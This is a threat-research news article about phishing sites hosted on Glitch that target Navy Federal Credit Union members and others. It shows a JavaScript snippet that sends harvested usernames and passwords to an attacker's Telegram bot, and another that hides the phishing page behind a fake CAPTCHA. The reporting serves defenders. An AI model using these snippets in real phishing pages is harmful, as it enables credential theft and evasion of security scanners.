Glitch-Hosted Phishing Campaign Hits 830 Organizations Using Telegram and Fake CAPTCHAs

Netskope Threat Labs tracked an alarming surge in phishing activity leveraging the Glitch web app platform. Attackers exploited Glitch’s free hosting and instant deployment features to launch hundreds of unique phishing sites, targeting over 830 organizations and compromising data from more than 3,000 individuals.

Navy Federal Credit Union (NFCU) members were singled out, but victims also included customers of T-Mobile, various banks, and corporate email services.

Traffic to these malicious Glitch-hosted sites tripled (increased 3.32x) during the four-month window, revealing both the scale and sophistication of the campaigns.

Telegram Exfiltration and CAPTCHA Evasion

The attackers’ success rests on two core techniques: the use of Telegram for real-time exfiltration of sensitive data including one-time passwords (OTPs) and the deployment of custom-built fake CAPTCHA barriers to thwart automated detection.

Abuse of Glitch Features for Stealth Hosting

Glitch offers frictionless web app development. Attackers take advantage of these features:

• Instant, Unique Subdomains: Each project is instantly live at URLs like:text<projectname-projectname-projectname.glitch[.]me>
• 24/7 Static Site Hosting: Static phishing sites don’t incur project-hour charges, staying online indefinitely.
• Rapid Cloning via “Remix”: Attackers quickly duplicate and spawn new phishing variants, each on a fresh subdomain.

Telegram: Real-Time Data Exfiltration and MFA Bypass

Almost half the phishing kits used Telegram’s Bot API to exfiltrate credentials and OTPs. Here is a typical data-theft flow:

1. Credential Harvesting: Victims log in to a fake NFCU site. Credentials are captured with JavaScript and sent to the attacker’s Telegram bot:javascriptfetch('https://api.telegram.org/bot<botToken>/sendMessage', { method: 'POST', body: JSON.stringify({ chat_id: '<attackerChatID>', text: 'User: ' + username + ' Pass: ' + password }), headers: { 'Content-Type': 'application/json' } });
2. OTP Interception: When prompted for an OTP, the user’s input is immediately relayed over Telegram, allowing attackers to bypass multi-factor authentication (MFA) almost instantly.
3. Location and Device Fingerprinting: Scripts leverage services like ipify and ipinfo.io to silently collect data such as IP, city, and country also sent to the attackers via Telegram.

Fake CAPTCHA: Cloaking and User Deception

To evade security scanners, some phishing kits hide credential forms behind a fake CAPTCHA a common evasion tactic growing in popularity:

• Visual Deception: Victims are greeted with a checkbox (“bot-check”). Once clicked, JavaScript replaces it with a spinner, simulating a loading CAPTCHA.
• Payload Delivery: Only after this “test” does the phishing page reveal itself, tricking users and hiding malicious content from automated web crawlers.

Example snippet:

javascriptdocument.getElementById('captcha').addEventListener('change', function() {
  this.style.display = 'none';
  document.getElementById('loader').style.display = 'block';
  setTimeout(function() {
    window.location.href = '/login.html'; // Redirect to phishing payload
  }, 1500);
});

Impact and Ongoing Research

Netskope’s analysis confirms that these techniques have enabled attackers to successfully bypass MFA, harvest thousands of credentials, and evade static scanning tools. Beyond NFCU, T-Mobile, and banking targets, the method is adaptable, posing a broad threat across sectors.

Security professionals are urged to block access to suspicious Glitch subdomains and monitor for Telegram-based exfiltration attempts.

Netskope and the broader cybersecurity community continue to track these developments, emphasizing the importance of employee phishing awareness and technical protections like domain allowlists and robust web filtering.

The Glitch-telegraphed campaigns represent a new wave of easily scalable, technically adept phishing operations.

As attackers innovate with platform abuse and evasion, defenders must keep pace combining user education, detection of suspicious web domains, and monitoring for novel exfiltration channels like Telegram.